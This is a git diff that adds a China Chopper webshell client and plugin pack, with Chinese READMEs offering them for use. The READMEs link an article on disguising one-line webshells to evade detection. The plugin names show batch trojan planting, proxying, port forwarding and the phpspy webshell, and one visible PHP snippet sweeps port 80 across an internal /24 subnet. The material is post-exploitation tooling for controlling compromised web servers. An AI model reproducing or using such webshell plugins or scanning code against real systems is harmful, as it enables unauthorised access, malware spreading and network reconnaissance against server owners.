diff --git a/caidao-shell/README.md b/caidao-shell/README.md index 5f69060..15dc73f 100644 --- a/caidao-shell/README.md +++ b/caidao-shell/README.md @@ -1,3 +1,9 @@ 这个是菜刀一句话客户端集合,如需要标准的,菜刀工具里是自带的。 +需要菜刀原程序的请自行百度 or google + +还有一点就是 菜刀最后的版本是caidao-20111116 + + zip压缩包的md5: 04A4980C9E86B5BA267F8E55CEAC2119 + "一句话"的艺术——简单的编码和变形绕过检测 url: http://drops.wooyun.org/tips/839 diff --git a/caidao-shell/caidao-plug/ASP读终端端口.ccc b/caidao-shell/caidao-plug/ASP读终端端口.ccc new file mode 100644 index 0000000..6409b5e Binary files /dev/null and b/caidao-shell/caidao-plug/ASP读终端端口.ccc differ diff --git a/caidao-shell/caidao-plug/Aspx文件搜索.ccc b/caidao-shell/caidao-plug/Aspx文件搜索.ccc new file mode 100644 index 0000000..6e654be Binary files /dev/null and b/caidao-shell/caidao-plug/Aspx文件搜索.ccc differ diff --git a/caidao-shell/caidao-plug/Aspx设置权限.ccc b/caidao-shell/caidao-plug/Aspx设置权限.ccc new file mode 100644 index 0000000..f7cb18d Binary files /dev/null and b/caidao-shell/caidao-plug/Aspx设置权限.ccc differ diff --git a/caidao-shell/caidao-plug/PHP批量挂马.ccc b/caidao-shell/caidao-plug/PHP批量挂马.ccc new file mode 100644 index 0000000..2aa8ea8 Binary files /dev/null and b/caidao-shell/caidao-plug/PHP批量挂马.ccc differ diff --git a/caidao-shell/caidao-plug/README.md b/caidao-shell/caidao-plug/README.md new file mode 100644 index 0000000..74eafb9 --- /dev/null +++ b/caidao-shell/caidao-plug/README.md @@ -0,0 +1,3 @@ +这个是菜刀插件包,比较早,各位就将就用吧~ +前人种树,后人乘凉。 +谢谢各位大牛 ^_^ diff --git a/caidao-shell/caidao-plug/asp目录写权限检测.ccc b/caidao-shell/caidao-plug/asp目录写权限检测.ccc new file mode 100644 index 0000000..fee1b1f Binary files /dev/null and b/caidao-shell/caidao-plug/asp目录写权限检测.ccc differ diff --git a/caidao-shell/caidao-plug/php_HTTP代理.ccc b/caidao-shell/caidao-plug/php_HTTP代理.ccc new file mode 100644 index 0000000..fb4a5b7 Binary files /dev/null and b/caidao-shell/caidao-plug/php_HTTP代理.ccc differ diff --git a/caidao-shell/caidao-plug/phpspy2011.ccc b/caidao-shell/caidao-plug/phpspy2011.ccc new file mode 100644 index 0000000..6f08b59 Binary files /dev/null and b/caidao-shell/caidao-plug/phpspy2011.ccc differ diff --git a/caidao-shell/caidao-plug/php端口转向.ccc b/caidao-shell/caidao-plug/php端口转向.ccc new file mode 100644 index 0000000..cdc6389 Binary files /dev/null and b/caidao-shell/caidao-plug/php端口转向.ccc differ diff --git a/caidao-shell/caidao-plug/扫描端口_php.ccc b/caidao-shell/caidao-plug/扫描端口_php.ccc new file mode 100644 index 0000000..d54d3d8 --- /dev/null +++ b/caidao-shell/caidao-plug/扫描端口_php.ccc @@ -0,0 +1,17 @@ +for ($i=1; $i<255; $i++) +{ + +$strHost = "192.168.1.{$i}"; +$fp = @fsockopen($strHost, 80, $errno, $errstr, 1); +if (!$fp) +{ + print "{$i}.{$errstr}\n"; +} +else +{ + print "{$i}.open\n"; +} + +fclose($fp); + +} \ No newline at end of file